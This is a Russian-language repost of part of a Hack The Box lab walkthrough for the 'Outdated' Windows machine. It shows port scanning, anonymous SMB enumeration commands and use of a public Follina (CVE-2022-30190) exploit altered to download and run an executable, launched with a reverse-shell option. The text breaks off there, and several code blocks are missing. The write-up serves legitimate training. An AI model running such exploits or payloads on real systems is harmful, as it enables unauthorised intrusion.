Категория > Новости > HTB Outdated. Повышаем привилегии через службу обновления Windows - «Новости»
HTB Outdated. Повышаем привилегии через службу обновления Windows - «Новости»21-12-2022, 00:00. Автор: Taylor |
Hack The Box. Ее уровень сложности оценен как средний. warningПодключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками. Разведка
Сканирование портовДобавляем IP-адрес машины в 10.10.11.175 outdated.htb И запускаем сканирование портов. Справка: сканирование портовСканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа. Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция Результат работы скрипта Мы нашли много открытых портов, что типично для Windows:
Порты 22 и 636 открывают нам новые доменные имена, которые добавим в файл 10.10.11.175 outdated.htb dc.outdated.htb mail.outdated.htb
Точка входаПервым делом необходимо проверить, нет ли анонимного доступа к службе SMB. Для этого авторизуемся от имени пользователя crackmapexec smb 10.10.11.175 -u 'guest' -p '' --shares Доступные общие ресурсы Получаем список общих ресурсов и отмечаем для себя доступный для чтения каталог impacket-smbclient guest@dc.outdated.htb use shares ls ![]() Содержимое каталога shares Находим всего один документ, который забираем на свой хост командой Содержимое документа NOC_Reminder.pdf Это отчет, который предоставляет нам список текущих уязвимостей (не факт, что закрытых). Также говорится, что мы можем прислать на адрес itsupport@outdated.htb ссылку на уязвимое приложение. В списке отмечаем недавно нашумевшую уязвимость CVE-2022-30190, она же Follina.
Точка опорыВоспользуемся готовым эксплоитом, но так как нам нужна ссылка на саму нагрузку, а не документ, содержащий ее, то внесем одно изменение. Найдем в исходном коде нагрузку и изменим ее на команду, которая скачает исполняемый файл и затем запустит. Измененный код эксплоита Теперь запустим файл python3 follina.py --interfacetun0 --port8000 --reverse4321 ![]() Запуск follina.py Перейти обратно к новости |